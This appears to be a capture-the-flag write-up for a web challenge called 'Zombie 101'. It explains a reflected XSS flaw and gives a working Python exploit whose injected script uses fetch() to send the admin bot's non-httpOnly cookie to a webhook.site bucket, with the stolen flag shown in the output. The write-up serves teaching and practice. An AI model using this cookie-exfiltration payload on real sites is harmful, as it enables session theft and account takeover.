Tags: web xss
Rating:
This writeup can also be found at [https://www.bugsbunnies.tk/2023/03/18/zombie.html](https://www.bugsbunnies.tk/2023/03/18/zombie.html).
We're presented with a simple webpage.
By submitting `<script>alert(1)</script>` to the first input we can see that it is not sanitized. This means we can inject arbitrary javascript into the page, making this an XSS vulnerabilty.
The user input is submitted as a url parameter like this: `https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ealert%281%29%3C%2Fscript%3E`.
This url can be submitted through the second input field and a bot will look at it.
The webpage is the same for all versions of the challenge, only the config changes slightly.
For Zombie 101 the config is as follows:
```json
{
"flag": "wctf{redacted}",
"httpOnly": false,
"allowDebug": true
}
```
The config is used to construct a cookie that is set on the bot when it visits the page.
We can exploit it through the url with a simple XSS as discussed above, since the cookie is not httpOnly.
The most important part here is the `payload` variable, the rest just sets up a request bucket and retrieves the result from it.
```python
import requests
import urllib.parse
# setup bucket
r = requests.post("https://webhook.site/token")
bucket_id = r.json()["uuid"]
bucket_url = f"https://webhook.site/{bucket_id}"
# execute exploit
visit_base = 'https://zombie-101-tlejfksioa-ul.a.run.app/visit?url='
show_base = 'https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show='
payload = f"""
<script>
fetch("{bucket_url}?cookie=" + document.cookie);
</script>
"""
target_url = visit_base + urllib.parse.quote_plus(show_base + urllib.parse.quote_plus(payload))
r = requests.get(target_url)
print(r.text)
# fetch result
r = requests.get(f"https://webhook.site/token/{bucket_id}/requests?sorting=newest")
print(r.json()["data"][0]["query"]["cookie"])
```
When running it we get the following output:
```console
$ python3 101.py
admin bot has visited your url
flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261}
```
